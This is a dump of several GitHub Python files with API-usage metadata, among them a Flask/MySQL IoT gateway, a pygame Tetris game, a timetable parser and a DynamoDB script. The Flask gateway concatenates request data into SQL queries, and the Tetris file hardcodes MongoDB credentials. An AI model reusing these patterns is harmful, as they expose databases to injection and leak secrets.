"django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 54, "usage_type": "call"}, {"api_name": "models.NewsTopic", "line_number": 54, "usage_type": "argument"}, {"api_name": "forms.CommentForm", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "forms.CommentForm", "line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.views.generic.UpdateView", "line_number": 70, "usage_type": "name"}, {"api_name": "models.posts", "line_number": 71, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 78, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 78, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "7721565954", "text": "from django.conf.urls import url\r\n# -----------------------------------------\r\nfrom management import views\r\n\r\nurlpatterns = [\r\n url(r'^$', views.index),\r\n url(r'^demo/$', views.demo),\r\n url(r'^addserverfun/$', views.addserverfun),\r\n #url(r'^addapp/$', views.addapp),\r\n #url(r'^addhost/$', views.addhost),\r\n #url(r'^addmodule/$', views.addmodule),\r\n]", "repo_name": "harrydengchao/OManager", "sub_path": "management/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "management.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "management.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "management.views.demo", "line_number": 7, "usage_type": "attribute"}, {"api_name": "management.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "management.views.addserverfun", "line_number": 8, "usage_type": "attribute"}, {"api_name": "management.views", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "40463387783", "text": "from pyproj import Proj, transform\nimport h5py\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\") #Performance warning from pytables\nimport sys\nsys.setrecursionlimit(10000)\nfrom make_met_forcing import ERA5_utils, track_class\nimport psutil\nimport time\n\ndef create_met_forcing(config,\n track_no,\n stop_date):\n\n track = get(config.year, track_no, config.tracks_dir)\n\n my_track = track_class.track(track,\n config.year,\n stop_date,\n config.aux_data_dir)\n\n my_track.track_no = track_no\n\n if my_track.valid_data:\n\n rean = ERA5_utils.add_reanalysis_to_track(my_track,\n config)\n\n full = ERA5_utils.add_derived_vars_to_track(rean)\n\n my_track.met_forcing = full\n\n initial_coords = xy_to_lonlat(my_track.info['start_coords'][0],\n my_track.info['start_coords'][1])\n\n start_date = my_track.info['start_date']\n\n my_track.metadata = (np.round(initial_coords, decimals=1), start_date)\n\n return(my_track)\n\ndef get(year,\n track_no,\n track_dir):\n\n track_file_name = f'{track_dir}tracks_{year}.h5'\n\n with h5py.File(track_file_name, 'r') as f:\n\n track = f[f't{track_no}'].value\n\n\n return (track)\n\ndef xy_to_lonlat(x, y):\n EASE_Proj = Proj(init='epsg:3408')\n WGS_Proj = Proj(init='epsg:4326')\n lon, lat = transform(EASE_Proj, WGS_Proj, x, y)\n return (lon, lat)\n\ndef lonlat_to_xy(lon, lat):\n EASE_Proj = Proj(init='epsg:3408')\n WGS_Proj = Proj(init='epsg:4326')\n x, y = transform(WGS_Proj, EASE_Proj, lon, lat)\n return (x, y)\n\ndef dangerous_temp():\n temps = psutil.sensors_temperatures()['coretemp']\n too_hot = False\n for i in temps:\n if i[1] > 70:\n too_hot = True\n\n return(too_hot)", "repo_name": "robbiemallett/SP_LG", "sub_path": "SP_LG/make_met_forcing/track_utils.py", "file_name": "track_utils.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.setrecursionlimit", "line_number": 7, "usage_type": "call"}, {"api_name": "make_met_forcing.track_class.track", "line_number": 18, "usage_type": "call"}, {"api_name": "make_met_forcing.track_class", "line_number": 18, "usage_type": "name"}, {"api_name": "make_met_forcing.ERA5_utils.add_reanalysis_to_track", "line_number": 27, "usage_type": "call"}, {"api_name": "make_met_forcing.ERA5_utils", "line_number": 27, "usage_type": "name"}, {"api_name": "make_met_forcing.ERA5_utils.add_derived_vars_to_track", "line_number": 30, "usage_type": "call"}, {"api_name": "make_met_forcing.ERA5_utils", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 39, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 49, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 57, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 58, "usage_type": "call"}, {"api_name": "pyproj.transform", "line_number": 59, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 63, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 64, "usage_type": "call"}, {"api_name": "pyproj.transform", "line_number": 65, "usage_type": "call"}, {"api_name": "psutil.sensors_temperatures", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "69793671234", "text": "import csv\nimport datetime\n\nclass_code_names = []\nclass_names = []\ndays = []\nstart_times = []\ndurations = []\nteaching_weeks = []\nlocations = []\nstaffs = []\n\nunavailable_times = []\n\nwith open('test.csv', encoding='utf-8-sig') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if len(row) > 2:\n class_code_names.append(row[0])\n class_names.append(row[1])\n days.append(row[3])\n start_times.append(row[4])\n durations.append(row[5])\n teaching_weeks.append(row[6])\n locations.append(row[7])\n staffs.append(row[8])\n\n\ndef day_to_iso_day(day):\n if day == \"Monday\":\n return 1\n elif day == \"Tuesday\":\n return 2\n elif day == \"Wednesday\":\n return 3\n elif day == \"Thursday\":\n return 4\n elif day == \"Friday\":\n return 5\n elif day == \"Saturday\":\n return 6\n elif day == \"Sunday\":\n return 7\n\n\ndef get_start_end_dates(day, start_time, teaching_week):\n\n periods = teaching_week.split(',')\n periods_formatted = []\n periods_calculated = []\n start_time = datetime.datetime.strptime(start_time, \"%I:%M%p\")\n\n for word in periods:\n period_formatted = word.replace(\" \", \"\").split('to')\n for i in range(len(period_formatted)):\n period_formatted[i] = datetime.datetime.strptime(period_formatted[i], \"%d/%m/%y\")\n period_formatted[i] += datetime.timedelta(hours=start_time.hour, minutes=start_time.minute)\n periods_formatted.append(period_formatted)\n\n add_initial_days = 0\n day = day_to_iso_day(day) # Monday - 1, Sunday - 7\n for period in periods_formatted:\n if len(period) == 2:\n if (datetime.datetime.isoweekday(period[0])) != day:\n add_initial_days = 7 - day\n period[0] += datetime.timedelta(days=add_initial_days)\n periods_calculated.append(period[0].isoformat())\n\n while period[0] <= period[1]:\n periods_calculated.append(period[0].isoformat())\n period[0] += datetime.timedelta(days=7)\n else:\n periods_calculated.append(period[0].isoformat())\n\n return periods_calculated\n\n\nfor i in range(1, len(class_code_names)):\n print(get_start_end_dates(days[i], start_times[i], teaching_weeks[i]))\n\n\n\n", "repo_name": "JasonLyy/monash-timetable-parser", "sub_path": "parse.py", "file_name": "parse.py", "file_ext": "py", "file_size_in_byte": 2365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.isoweekday", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "23524842517", "text": "#TODO Drop Table instead of database to avoid giving all previlages to gnostis\r\n\r\nfrom flask import Flask,request, render_template\r\nimport mysql.connector \r\nfrom datetime import datetime, timedelta\r\nimport pytz\r\nimport webbrowser\r\n\r\n#pip3 install mysql-connector-python==8.0.29\r\n#pip3 install DateTime\r\n#pip3 install flask\r\n#pip3 install pytz\r\n\r\n#sudo apt install mariadb-server\r\n#sudo mysql_secure_installation\r\n#set password and answer yes to all\r\n#Then run mysql -u root -p\r\n#and login\r\n#then give permissions to gnostis\r\n#CREATE USER 'gnostis'@'localhost' IDENTIFIED BY 'gnostis'; \r\n#GRANT ALL PRIVILEGES ON *.* TO 'gnostis'@'localhost' WITH GRANT OPTION; \r\n\r\napp = Flask(__name__)\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"gnostis\",\r\n password=\"gnostis\"\r\n )\r\n\r\nmycursor = mydb.cursor()\r\nmycursor.execute(\"DROP DATABASE IF EXISTS microlabIoT\")\r\nmycursor.execute(\"CREATE SCHEMA IF NOT EXISTS microlabIoT DEFAULT CHARACTER SET utf8\")\r\nmycursor.execute(\"USE microlabIoT\")\r\nmycursor.execute(\"CREATE DATABASE IF NOT EXISTS microlabIoT\")\r\n#mycursor.execute(\"CREATE TABLE IF NOT EXISTS teams (team VARCHAR(255), temperature VARCHAR(255), pressure VARCHAR(255), status VARCHAR(255))\")\r\nmycursor.execute(\"CREATE TABLE IF NOT EXISTS teams (team VARCHAR(255), temperature VARCHAR(255), pressure VARCHAR(255), status VARCHAR(255), timestamp DATETIME, PRIMARY KEY (team))\")\r\n#timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n#timeNow = timeNow.strftime('%Y-%m-%d %H:%M:%S')\r\n#mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status,timestamp) VALUES (%s, %s, %s, %s, %s)\", ('1', '20C','10%','help',timeNow))\r\n#mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status) VALUES ('2', '25C','20%','OK')\")\r\n#mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status) VALUES ('3', '30C','30%','OK')\")\r\n\r\n@app.route('/')\r\ndef home():\r\n try:\r\n mycursor = mydb.cursor()\r\n #mycursor.execute(\"SELECT * FROM teams\")\r\n timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n time30MinutesAgo=timeNow-timedelta(minutes=30)\r\n time30MinutesAgo = time30MinutesAgo.strftime('%Y-%m-%d %H:%M:%S')\r\n mycursor.execute(\"SELECT * FROM teams WHERE timestamp >='\"+time30MinutesAgo+\"'\")\r\n myresult = mycursor.fetchall()\r\n\r\n #for x in myresult:\r\n # print(x)\r\n\r\n #print (myresult[0])\r\n \r\n return render_template('home.html',data=myresult)\r\n except:\r\n print(\"MY SQL IS BUSY\")\r\n return (\"\")\r\n \r\n\r\n@app.route('/data', methods = ['GET', 'POST', 'DELETE'])\r\ndef data():\r\n #mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status) VALUES ('4', '20C','10%','help')\")\r\n if request.method == 'GET':\r\n \"\"\"return the information for \"\"\"\r\n #print(\"GET\")\r\n return(200)\r\n if request.method == 'POST':\r\n if request.headers.get('Content-Type'):\r\n #print(request.headers['Content-Type'])\r\n try:\r\n data=request.get_json()\r\n except:\r\n return('400 corrupted json')\r\n #for x in data:\r\n #print(str(x).replace(\"'\",'\\\"'))\r\n #datadict=json.loads(str(data).replace(\"'\",'\\\"'))\r\n datadict={\r\n \"temperature\":\"None\",\r\n \"pressure\":\"None\",\r\n \"team\":\"None\",\r\n \"status\":\"None\"\r\n }\r\n for object in data:\r\n #print(object)\r\n try:\r\n #if object[\"name\"]==\"team\" and object[\"value\"]==\"3\":\r\n # object[\"value\"]=u'\\xfb9'\r\n #object[\"name\"].encode('utf-8')\r\n #object[\"value\"].encode('utf-8')\r\n if(object[\"name\"].replace(\".\",\"\").isalnum() == False):\r\n print(\"name problem\")\r\n return('400 Invalid chars in json')\r\n if(object[\"value\"].replace(\".\",\"\").isalnum() ==False):\r\n print(\"value problem\")\r\n return('400 Invalid chars in json')\r\n datadict[object[\"name\"]]=object[\"value\"]\r\n except:\r\n print(object[\"name\"])\r\n print(object[\"value\"])\r\n return('400 Invalid chars in json')\r\n if datadict['team']==\"None\" or datadict['team']==\"\":\r\n print(\"Invalid team selected\")\r\n return('400 Invalid team')\r\n #print(datadict)\r\n mycursor.execute(\"SELECT * FROM teams WHERE team='\"+str(datadict['team'])+\"'\")\r\n exists=mycursor.fetchall()\r\n timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n timeNow = timeNow.strftime('%Y-%m-%d %H:%M:%S')\r\n if (exists==[]):\r\n mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status,timestamp) VALUES (%s, %s, %s, %s, %s)\",(str(datadict['team']), str(datadict['temperature']),str(datadict['pressure']),str(datadict['status']),timeNow))\r\n else:\r\n mycursor.execute(\"UPDATE teams SET temperature=%s,pressure=%s,status=%s,timestamp=%s WHERE team=%s\",(str(datadict['temperature']),str(datadict['pressure']),str(datadict['status']),timeNow,str(datadict['team'])))\r\n\r\n return('200 OK')\r\n else:\r\n data= request.form\r\n #check if team exists\r\n mycursor.execute(\"SELECT * FROM teams WHERE team='\"+str(data.get('team'))+\"'\")\r\n exists=mycursor.fetchall()\r\n timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n timeNow = timeNow.strftime('%Y-%m-%d %H:%M:%S')\r\n if (exists==[]):\r\n mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status,timestamp) VALUES (%s, %s, %s, %s, %s)\",(str(data.get('team')), str(data.get('temperature')),str(data.get('pressure')),str(data.get('status')),timeNow))\r\n else:\r\n mycursor.execute(\"UPDATE teams SET temperature=%s,pressure=%s,status=%s,timestamp=%s WHERE team=%s\",(str(data.get('temperature')),str(data.get('pressure')),str(data.get('status')),timeNow,str(data.get('team'))))\r\n \r\n print(\"Received Data:\")\r\n print(data)\r\n print(\"End of Data\")\r\n return('200 OK')\r\n else:\r\n # POST Error 405 Method Not Allowed\r\n print(\"405 Method Not Allowed\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #app.run(host='0.0.0.0',debug=False)\r\n webbrowser.open('http://localhost:5000') \r\n app.run(debug=False)", "repo_name": "mvaki/GatewayForMicrolabIoT", "sub_path": "microlabIoT.py", "file_name": "microlabIoT.py", "file_ext": "py", "file_size_in_byte": 6667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 23, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 113, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 126, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 126, "usage_type": "call"}, {"api_name": "webbrowser.open", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "41167395682", "text": " # Creation of Table in DynamoDB\r\n\r\n # a SDK package for aws in python\r\nimport boto3 \r\n\r\n# user should go on with below line of code if they have'nt configured through AWS previously (Note)\r\n# client = boto3.client('dynamodb',aws_access_key_id='yyyy', aws_secret_access_key='xxxx', region_name='***') \r\n\r\n# aws service resource and region are set.\r\n\r\ndynamodb = boto3.resource('dynamodb', region_name='us-east-1') \r\nname=input(\"Enter name of the table :\\t\")\r\n\r\n# Creation of table\r\n\r\ntable = dynamodb.create_table( \r\n TableName=movies,\r\n KeySchema=[\r\n {\r\n \r\n # here Attribute 'year' is a partition key and it is of type hash which is derived using hash function\r\n \r\n 'AttributeName': 'year',\r\n 'KeyType': 'HASH' #Partition key \r\n \r\n },\r\n {\r\n \r\n # here Attribute 'title' is a sort key and it is of type Range\r\n \r\n 'AttributeName': 'title', \r\n 'KeyType': 'RANGE' #Sort key\r\n }\r\n ],\r\n AttributeDefinitions=[ \r\n {\r\n \r\n \r\n # N represents the datatype of attribute 'year' should be a number\r\n \r\n 'AttributeName': 'year', \r\n 'AttributeType': 'N'\r\n },\r\n {\r\n # S represents the datatype of attribute 'title' should be a string\r\n \r\n 'AttributeName': 'title', \r\n 'AttributeType': 'S'\r\n },\r\n\r\n ],\r\n # throughput parameters\r\n ProvisionedThroughput={\r\n 'ReadCapacityUnits': 10, \r\n 'WriteCapacityUnits': 10\r\n }\r\n \r\n)\r\n\r\nprint(\"Table status:\", table.table_status)", "repo_name": "NitinCR/dyanomodb", "sub_path": "createtable.py", "file_name": "createtable.py", "file_ext": "py", "file_size_in_byte": 2016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "boto3.resource", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "38727993457", "text": "import torch\nfrom torch.nn import Module\nfrom torch.nn.functional import softplus\n\n\nclass BoxEmbedding:\n def __init__(self, volume_temp: float = 1.0, threshold: float = 20):\n super().__init__()\n self.volume_temp = volume_temp\n self.threshold = threshold\n\n def get_box_embeddings(self, vector: torch.Tensor):\n \"\"\"\n create box embedding from vector\n shape: [batch_size, box_min/box_max, hidden_dim]\n box_min: bottom-left corner (=center-offset), box_max: top-right corner (= center+offset)\n center: (box_max+box_min)/2\n offset: (box_max-box_min)/2\n \"\"\"\n len_dim = vector.shape[-1]\n dim = -1\n\n if len_dim % 2 != 0:\n raise ValueError(f\"The last dimension of vector should be even but is {vector.shape[-1]}\")\n\n split_point = int(len_dim/2)\n # box_min: [batch_size, vector_dim/2]; [64, 256]\n box_min = vector.index_select(dim, torch.tensor(list(range(split_point)), dtype=torch.int64, device=vector.device))\n delta = vector.index_select(dim, torch.tensor(list(range(split_point, len_dim)), dtype=torch.int64, device=vector.device))\n box_max = box_min + softplus(delta, beta=1 / self.volume_temp, threshold=self.threshold)\n\n assert box_min.shape == box_max.shape\n assert (box_max >= box_min).all()\n\n return torch.stack((box_min, box_max), dim=-2) # [batch_size, 2, vector_dim/2]; [64, 2, 256]", "repo_name": "iesl/CE2ERE", "sub_path": "src/embeddings.py", "file_name": "embeddings.py", "file_ext": "py", "file_size_in_byte": 1449, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.softplus", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "36649607996", "text": "import pygame\nimport pymongo\n\nfrom board import *\nfrom game import *\n# para poner sonido\nfrom pygame.locals import *\nfrom pygame import mixer\n\n# Pedir al usuario que ingrese su nombre\n\nprint(\" _______________________________________________ \")\nprint(\"| Tetris |\")\nprint(\"|_______________________________________________|\")\nname = input(\"| Usuario: \")\nprint(\"|_______________________________________________|\")\npygame.font.init()\n\n\ndef main(win): \n last_score = max_score()\n # diccionario para guardar las posiciones de las piezas que ya han caido\n locked_positions = {}\n grid = create_grid(locked_positions)\n \n change_piece = False\n run = True\n current_piece = get_shape()\n next_piece = get_shape()\n # clock para controlar los fps\n clock = pygame.time.Clock()\n fall_time = 0\n fall_speed = 0.27\n level_time = 0\n score = 0\n \n # Soundtrack\n mixer.init()\n # Para cargar el archivo de audio hay que estar en /ProyectoPython-Tetris/src/ \n mixer.music.load('utilities/crystals.mp3')\n # -1 para que se repita\n mixer.music.play(-1)\n\n # Conectarse a la base de datos\n try:\n client = pymongo.MongoClient(\"mongodb+srv://m002-student:12345@sandbox01.2yg0wjn.mongodb.net/?retryWrites=true&w=majority\")\n db = client.test\n db = client[\"Tetris\"]\n puntuaciones = db[\"usuarios\"]\n print(\"Conectado a la base de datos\")\n except:\n print(\"Error al conectarse a la base de datos\")\n\n\n while run:\n # variables fall_time y level_time para controlar el tiempo de caida de la pieza\n grid = create_grid(locked_positions)\n fall_time += clock.get_rawtime()\n level_time += clock.get_rawtime()\n # usamos clock.tick() para que el juego no vaya mas rapido de lo que queremos\n clock.tick()\n\n # Aumenta la velocidad de caida segun el tiempo\n if level_time/1000 > 5:\n level_time = 0\n if level_time > 0.12:\n level_time -= 0.005\n \n # Control de tiempo de caida de la pieza\n if fall_time/1000 > fall_speed:\n fall_time = 0\n current_piece.y += 1\n if not(valid_space(current_piece, grid)) and current_piece.y > 0:\n current_piece.y -= 1\n change_piece = True\n\n # Si se cierra la ventana se detiene el juego\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.display.quit()\n\n # Uso de pygame para teclas\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n current_piece.x -= 1\n if not(valid_space(current_piece, grid)):\n current_piece.x += 1\n if event.key == pygame.K_RIGHT:\n current_piece.x += 1\n if not(valid_space(current_piece, grid)):\n current_piece.x -= 1\n if event.key == pygame.K_DOWN:\n current_piece.y += 1\n if not(valid_space(current_piece, grid)):\n current_piece.y -= 1\n if event.key == pygame.K_UP:\n current_piece.rotation += 1\n if not(valid_space(current_piece, grid)):\n current_piece.rotation -= 1\n if event.key == pygame.K_SPACE:\n run = False\n pygame.display.quit()\n \n # se le asigna la lista de posiciones de la pieza actual\n shape_pos = convert_shape_format(current_piece)\n\n # recorre la pieza y asigna el color \n for i in range(len(shape_pos)):\n x, y = shape_pos[i]\n if y > -1:\n grid[y][x] = current_piece.color\n\n # se recorre posiciones de la pieza y se agrega cada una de ellas al diccionario\n if change_piece:\n for pos in shape_pos:\n p = (pos[0], pos[1])\n locked_positions[p] = current_piece.color\n current_piece = next_piece\n next_piece = get_shape()\n change_piece = False\n # se suma 10 puntos por cada fila eliminada\n score += clear_rows(grid, locked_positions) * 10\n\n draw_window(win, grid, score, last_score)\n draw_next_shape(next_piece, win)\n pygame.display.update()\n\n if check_lost(locked_positions):\n # Insertar datos en la base de datos\n puntuaciones.insert_one({ \"nombre\": name, \"puntuacion\": score})\n draw_text_middle(win, 'GAME OVER', 80, (255,255,255))\n pygame.display.update()\n pygame.time.delay(1500)\n run = False\n update_score(score)\n # se actualiza el ultimo puntaje si es mas alto\n if score > last_score:\n last_score = score\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.display.quit()\n\ndef main_menu(win): \n run = True\n while run:\n win.fill((0,0,0))\n draw_text_middle(win, 'Pulsa cualquier tecla para empezar', 50, (255,255,255))\n pygame.display.update()\n # si se presiona cualquier tecla se inicia el juego\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.KEYDOWN:\n main(win)\n\n pygame.display.quit()\n\n\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Tetris: El Jueguito')\nmain_menu(win)", "repo_name": "Jouad01/ProyectoPython-Tetris", "sub_path": "src/tetris.py", "file_name": "tetris.py", "file_ext": "py", "file_size_in_byte": 5710, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.font.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.mixer.init", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 38, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 40, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 42, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 127, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 141, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 143, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 153, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 155, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 158, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 158, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 161, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 162, "usage_type": "attribute"}]} +{"seq_id": "11668479147", "text": "#from django import forms\n#from django.http import HttpResponseRedirect\n\nimport sys\n\nfrom django import forms\nfrom django.forms import ModelForm, Textarea\n\nfrom django.http import HttpResponseRedirect\n\nfrom mezzanine.pages.page_processors import processor_for\nfrom .models import Organization, Residency\n\nclass OrganizationForm(ModelForm):\n #about = forms.CharField(label=\"foobar\")\n print >>sys.stderr, \"organization form up top\"\n class Meta:\n print >>sys.stderr, \"organization form up top meta\"\n model = Organization\n # the form displays the field in the order of this array.\n # maybe use the pages_page.title for our name\n fields=['name', 'website', 'street_address', 'city', 'state',\n 'postal_code', 'country', 'email', 'phone', 'about' ]\n #'postal_code', 'country', 'email', 'phone', 'about']\n\n print >>sys.stderr,\"before widgets\"\n widgets = {\n 'title': Textarea(attrs={'size':'100'}),\n 'name': Textarea(attrs={'size':'1', 'rows':'1'}),\n 'about': Textarea(attrs={'cols':'150', 'rows':'8'}),\n } \n print >>sys.stderr,\"widgets\",widgets\n # i have seen examples with the numbers in quotes, and not in quotes.\n #'about': Textarea(attrs={'cols':'150', 'rows':'8'}),\n # these labels are not being used. The help_text from models is being\n # used.\n labels= {\n 'title':'Organization Name',\n 'name':'Organzation Name',\n 'website':'Website',\n 'street_address':'Street Address',\n 'city':'City',\n 'state':'State if 